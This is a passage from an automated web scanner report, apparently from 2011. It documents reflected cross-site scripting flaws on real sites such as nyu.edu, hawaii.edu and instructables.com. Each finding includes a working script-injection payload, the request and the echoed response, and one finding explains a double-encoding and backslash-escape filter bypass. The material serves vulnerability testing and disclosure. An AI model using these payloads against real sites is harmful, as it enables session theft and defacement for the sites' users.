The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a069f"><a>fa73276c69b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-statusa069f"><a>fa73276c69b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=0BF6138D3014E466E27114273C8EC136; Domain=.gather.com; Path=/
Set-Cookie: vis=o0JaG/eewVZTRguqPAsipjl9Szxiq8W6qeCiGW8xw8ln+1Xp1O0ABnI+4A91R97CvVOiiY6bS5AUL8v4iSkMbJ8E6gC5VfIFo33vvcd0rlI=; Domain=gather.com; Expires=Fri, 28-Mar-2031 02:56:07 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=s6btjABk/s9Ri5yFfKHe80g4Xd0MiyH5cmyyIytVeY+nxKpwwPnFg+oSPJPTU7PvJM7B0c1otwa4Yf3fdjYqAHZiseT1+HY3In+b+nwbmwjXpqvLrspIJivolikGDxhY; Domain=gather.com; Expires=Fri, 28-Mar-2031 02:56:07 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17498
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<meta name="keywordVal" content="server-statusa069f"><a>fa73276c69b" >
...[SNIP]...

3.48. http://www.gather.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gather.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db044<img%20src%3da%20onerror%3dalert(1)>5fc9a5d41a was submitted in the REST URL parameter 1. This input was echoed as db044<img src=a onerror=alert(1)>5fc9a5d41a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-statusdb044<img%20src%3da%20onerror%3dalert(1)>5fc9a5d41a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:56:25 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=6C84C2B1F8D16A96A14EFF99C223B1B8; Domain=.gather.com; Path=/
Set-Cookie: vis=J94I6mgdUTkPLLKnAGEiqu/+cnGw4e9HDdERbR5VKWBSHjh1NEKCzF/9Abwh5bXIzHTVbJ7nNHapgFGgAa9IpDRxV8mh14nO3zg+0/wJFew=; Domain=gather.com; Expires=Fri, 28-Mar-2031 02:56:25 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=v1SxHsqgDSj9jyXNwO0Ajw4UGwmlx/HffDfX3+nIUKyAsnoMXEaSiIqJNcCPelIkXpv2tgjgPMpv6eZya4IWGr3oOrcxfYwepOPopZQOsUpCGKXTExbfVXOvn2S7561W; Domain=gather.com; Expires=Fri, 28-Mar-2031 02:56:25 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17580
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<em>server-statusdb044<img src=a onerror=alert(1)>5fc9a5d41a</em>
...[SNIP]...

3.49. http://www.groupfusion.net/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.groupfusion.net
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8838b<script>alert(1)</script>dc3ccf4c169 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status8838b<script>alert(1)</script>dc3ccf4c169 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.groupfusion.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:11:12 GMT
Server: Apache/2.2.8 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 293

<html><body><b>The page you requested:<br/><i>www.groupfusion.net/server-status8838b<script>alert(1)</script>dc3ccf4c169</i><br/> does not exist on www.groupfusion.net<br />Please click <a href='http:
...[SNIP]...

3.50. http://www.hawaii.edu/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hawaii.edu
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5507a"><script>alert(1)</script>921f6b033f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status5507a"><script>alert(1)</script>921f6b033f3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hawaii.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:42:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6367
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/server-status5507a"><script>alert(1)</script>921f6b033f3" size="60">
...[SNIP]...

3.51. http://www.hawaii.edu/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hawaii.edu
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97987"><script>alert(1)</script>a396d6b5b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?97987"><script>alert(1)</script>a396d6b5b4b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hawaii.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:42:02 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6370
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/server-status?97987"><script>alert(1)</script>a396d6b5b4b=1" size="60">
...[SNIP]...

3.52. http://www.instructables.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.instructables.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eae87<script>alert(1)</script>cfdb657e7b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statuseae87<script>alert(1)</script>cfdb657e7b7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instructables.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
Content-Length: 17718
Cache-Control: no-cache
X-Cacheable: no-404
Date: Sat, 02 Apr 2011 03:00:56 GMT
X-Varnish: 789779472
Age: 1
Via: 1.1 varnish
X-Cache-Svr: squid04.instructables.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<p>
  We're sorry, the URL http://www.instructables.com/server-statuseae87<script>alert(1)</script>cfdb657e7b7 is either incorrect or no longer available. Maybe you are looking for one of the following Instructables below.
</p>
...[SNIP]...

3.53. http://www.jotform.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.jotform.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0e3f<script>alert(1)</script>ce8807e8a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusa0e3f<script>alert(1)</script>ce8807e8a60 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jotform.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Sat, 02 Apr 2011 02:22:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Status: 404 Not Found
Vary: Accept-Encoding
Content-Length: 253

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL "server-statusa0e3f<script>alert(1)</script>ce8807e8a60" was not found on this server.</p>
...[SNIP]...

3.54. http://www.listal.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.listal.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 580f0'><script>alert(1)</script>bc57259f36b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status580f0'><script>alert(1)</script>bc57259f36b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.listal.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.0
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Sat, 02 Apr 2011 02:12:57 GMT
Server: lighttpd/1.4.23
Content-Length: 12464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<input type='hidden' name='backurl' value='http://www.listal.com/server-status580f0'><script>alert(1)</script>bc57259f36b' />
...[SNIP]...

3.55. http://www.listal.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.listal.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a401f'><script>alert(1)</script>6114f0f3f02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?a401f'><script>alert(1)</script>6114f0f3f02=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.listal.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.0
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Sat, 02 Apr 2011 02:12:46 GMT
Server: lighttpd/1.4.23
Content-Length: 12467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<input type='hidden' name='backurl' value='http://www.listal.com/server-status?a401f'><script>alert(1)</script>6114f0f3f02=1' />
...[SNIP]...

3.56. http://www.magazines.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.magazines.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bd55'%3balert(1)//1eef03b7c29 was submitted in the REST URL parameter 1. This input was echoed as 6bd55';alert(1)//1eef03b7c29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status6bd55'%3balert(1)//1eef03b7c29 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.magazines.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:48:02 GMT
Server: Apache
Set-Cookie: gs-had=9935bdd04b587bea81f4bf7826018df71e2f65bc; path=/; expires=Sun, 03-Apr-2011 02:48:02 GMT
Set-Cookie: had-source=173.193.214.243; path=/; expires=Tue, 05-Apr-2011 02:48:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=31536000
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT STA"
Set-Cookie: gs-had=9935bdd04b587bea81f4bf7826018df71e2f65bc; path=/; expires=Sun, 03-Apr-2011 02:48:02 GMT
Set-Cookie: had-source=173.193.214.243; path=/; expires=Tue, 05-Apr-2011 02:48:02 GMT
Content-Length: 47657
Expires: Sun, 01 Apr 2012 02:48:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

...[SNIP]...

3.57. http://www.manta.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.manta.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9afcc"><script>alert(1)</script>ae19b9c022f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /9afcc"><script>alert(1)</script>ae19b9c022f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 02:33:20 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4696
X-Varnish: 3114140320
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/9afcc"><script>alert(1)</script>ae19b9c022f at Sat Apr 2 02:33:20 2011 +0000 from 173.193.214.243">
...[SNIP]...

3.58. http://www.manta.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.manta.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc594<script>alert(1)</script>f0047a220c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cc594<script>alert(1)</script>f0047a220c5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 02:33:20 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4692
X-Varnish: 1293913149
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/cc594<script>alert(1)</script>f0047a220c5 at Sat Apr 2 02:33:20 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

3.59. http://www.marthastewart.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marthastewart.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eaea"-alert(1)-"b68a89bfca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /5eaea"-alert(1)-"b68a89bfca4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marthastewart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Last-Modified: Sat, 02 Apr 2011 02:57:05 +0000
ETag: "1301713025"
Content-Type: text/html; charset=utf-8
X-Ttl: 14400.000
ntCoent-Length: 21362
X-Varnish: 1676929742
X-Req-Grace: 20.000
Cache-Control: private, max-age=0
Expires: Sat, 02 Apr 2011 02:57:05 GMT
Date: Sat, 02 Apr 2011 02:57:05 GMT
Content-Length: 21362
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
mniturePageName="page not found";
s.server="www.marthastewart.com";
s.pageType="";
s.prop1="";
s.prop3="";
s.prop4="channel";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop12="http://www.marthastewart.com/5eaea"-alert(1)-"b68a89bfca4";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop17="";
s.prop18="";
s.prop19="";
s.prop20="";
s.prop21="";
s.prop22="";
s.prop23="";
s.prop24="";
s.prop25="";
s.prop26="";
s.prop27="logged
...[SNIP]...

3.60. http://www.medications.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.medications.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3e90%255c%2522%253balert%25281%2529%252f%252f829de0d3ff2 was submitted in the REST URL parameter 1. This input was echoed as a3e90\\";alert(1)//829de0d3ff2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-statusa3e90%255c%2522%253balert%25281%2529%252f%252f829de0d3ff2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medications.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:11:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "c6e317a8e116c5864e82b7298000b5a0"
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
X-Runtime: 1.543419
Set-Cookie: _medications_session=BAh7CUkiD3Nlc3Npb25faWQGOgZFRiIlOWVjMTBjOWY1MGNiZDQ4NzVlZjkxMmEzOWM0YWY5N2JJIhFoYXNfc2VhcmNoZWQGOwBGVEkiEF9jc3JmX3Rva2VuBjsARkkiMTV4TFpZd2xFM09PdE5iTUs1c3RvSFZNaDRvYkFBQzZiaVpKRHRVc0tibzg9BjsARkkiCmZsYXNoBjsARklDOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaHsGOhB0cmFja2luZ19qc1sISSIbZ2FTZXRTZWFyY2hlZCggX2dhcSApOwY7AEZJIk1nYVNldFNlYXJjaGVkRm9yKCBfZ2FxLCAic2VydmVyLXN0YXR1c2EzZTkwXFwiO2FsZXJ0KDEpLy84MjlkZTBkM2ZmMiIgKTsGOwBGSSI4Z2FWaXJ0dWFsUGFnZVZpZXcoIF9nYXEsICIvaWdub3JlL2dhL3Zwdi9zZWFyY2giICk7BjsARgY6CkB1c2VkbzoIU2V0BjoKQGhhc2h7BjsHVA%3D%3D--a7c6172ac760634eb27d69ffd030f8f32e49072c; path=/; HttpOnly
Status: 200
Content-Type: text/html; charset=utf-8
Content-Length: 24591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-21047672-1']);
gaSetSearched( _gaq );gaSetSearchedFor( _gaq, "server-statusa3e90\\";alert(1)//829de0d3ff2" );gaVirtualPageView( _gaq, "/ignore/ga/vpv/search" );
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascri
...[SNIP]...

3.61. http://www.nationalguard.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nationalguard.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69540<img%20src%3da%20onerror%3dalert(1)>1d959bd914b was submitted in the REST URL parameter 1. This input was echoed as 69540<img src=a onerror=alert(1)>1d959bd914b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /server-status69540<img%20src%3da%20onerror%3dalert(1)>1d959bd914b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationalguard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.5-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Set-Cookie: guardSID=0d27c45f5897afdd64bce46a2479f56b; path=/; domain=.nationalguard.com
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 81283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta
...[SNIP]...
<h1 class="rr_h1">Sorry, no results for: server-status69540<img src=a onerror=alert(1)>1d959bd914b </h1>
...[SNIP]...

3.62. http://www.nyu.edu/server-info [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nyu.edu
Path:	/server-info

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38095<script>alert(1)</script>2b770d2c546 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-info?38095<script>alert(1)</script>2b770d2c546=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nyu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 01:54:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7d
Content-Type: text/html
Content-Length: 9785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York University > 403 F
...[SNIP]...
<p>http://nyu.edu/server-info?38095<script>alert(1)</script>2b770d2c546=1</p>
...[SNIP]...

3.63. http://www.nyu.edu/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nyu.edu
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 500f4<script>alert(1)</script>ddaff05e65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?500f4<script>alert(1)</script>ddaff05e65a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nyu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:26:56 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7d
Content-Type: text/html
Content-Length: 9787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York University > 403 F
...[SNIP]...
<p>http://nyu.edu/server-status?500f4<script>alert(1)</script>ddaff05e65a=1</p>
...[SNIP]...

3.64. http://www.offers.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.offers.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e356a"><script>alert(1)</script>7ad6e41a8ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

